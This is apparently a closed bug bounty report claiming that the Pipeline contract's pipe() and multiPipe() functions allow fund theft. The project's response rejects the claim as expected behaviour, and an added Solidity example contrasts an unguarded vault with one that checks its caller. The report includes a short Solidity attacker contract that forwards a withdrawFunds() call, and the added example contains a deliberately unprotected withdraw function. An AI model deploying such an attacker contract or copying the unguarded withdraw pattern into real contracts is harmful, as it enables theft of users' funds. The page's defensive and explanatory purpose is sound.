
Report #14504

Report Date: December 9, 2022
Status: Closed
Payout

Theft of funds with Pipeline

Report Info

Report ID: #14504

Target

Report type: Smart Contract

Impacts: Direct theft of any user funds, whether at-rest or in-motion, other than unclaimed yield

Has PoC?: Yes

Bug Description

The pipeline contract allows users to call any function on other protocols through the pipe() and multiPipe() functions. This means that an attacker could call a function on another contract that allows them to transfer funds out of that contract.

Impact

allows anyone to withdraw funds, an attacker could call that function through the pipeline contract and steal the funds from the other contract.

Risk Breakdown

Difficulty to Exploit: Medium
Weakness:
CVSS2 Score: 6

Recommendation

to include a requirement for users to provide proof of ownership of the funds they are attempting to transfer through the pipe() or multiPipe() functions.

Proof of concept

    // Attacker contract
    contract Attacker {
        // Address of the Pipeline contract
        address pipelineAddress;
        // Address of the vulnerable contract
        address vulnerableAddress;

        constructor(address _pipelineAddress, address _vulnerableAddress) public {
            pipelineAddress = _pipelineAddress;
            vulnerableAddress = _vulnerableAddress;
        }

        // Function to call the vulnerable contract's withdrawFunds() function
        // through the Pipeline contract
        function attack() public {
            // Create a PipeCall struct with the target set to the vulnerable contract's
            // address and the calldata set to the ABI-encoded withdrawFunds()
            // function call
            PipeCall memory call = PipeCall({
                target: vulnerableAddress,
                data: abi.encodeWithSignature("withdrawFunds()")
            });

            // Call the pipe() function on the Pipeline contract to execute the function
            // call on the vulnerable contract, which would allow the attacker to steal all of
            // the vulnerable contract's funds.
            IPipeline(pipelineAddress).pipe(call);
        }
    }

BIC Response

This is not a security bug report because the report outlines expected functionality. Pipeline was built with the philosophy that it is not the smart contract's role to protect users against misuse. See the Risk section of the Pipeline whitepaper: https://evmpipeline.org/pipeline.pdf#section.6

Due to these reasons, we are closing the submission and no reward will be issued.
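
The response above leaves caller authorization to the contract being called. The following added example (not from the report or from the Pipeline code base) puts a target with no caller check beside one that authorizes the caller itself. `ForwarderStandIn`, `UnguardedVault` and `GuardedVault` are hypothetical names, and the stand-in assumes forwarding by a regular external call, so the target sees the forwarder as `msg.sender`.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.19;

// Constructed example, not Pipeline's code. Assumption: the forwarder uses a
// regular external call, so the target sees msg.sender == forwarder.
struct PipeCall { address target; bytes data; }

contract ForwarderStandIn { // hypothetical stand-in for pipe()
    receive() external payable {}
    function pipe(PipeCall calldata p) external payable returns (bytes memory result) {
        bool ok;
        (ok, result) = p.target.call(p.data);
        require(ok, "forwarded call reverted");
    }
}

// Weak target: no caller check, so a direct call and a forwarded call both
// empty it. The missing check is in this contract, not in the forwarder.
contract UnguardedVault {
    receive() external payable {}
    function withdrawFunds() external {
        (bool ok, ) = msg.sender.call{value: address(this).balance}("");
        require(ok, "transfer failed");
    }
}

// Hardened target: pays out only what the immediate caller deposited.
// A forwarded call arrives with the forwarder as msg.sender, whose recorded
// balance is zero unless it deposited itself, so the call reverts.
contract GuardedVault {
    mapping(address => uint256) public balanceOf;

    function deposit() external payable {
        balanceOf[msg.sender] += msg.value;
    }

    function withdrawFunds() external {
        uint256 amount = balanceOf[msg.sender];
        require(amount > 0, "nothing to withdraw");
        balanceOf[msg.sender] = 0; // effects before the external call
        (bool ok, ) = msg.sender.call{value: amount}("");
        require(ok, "transfer failed");
    }
}
```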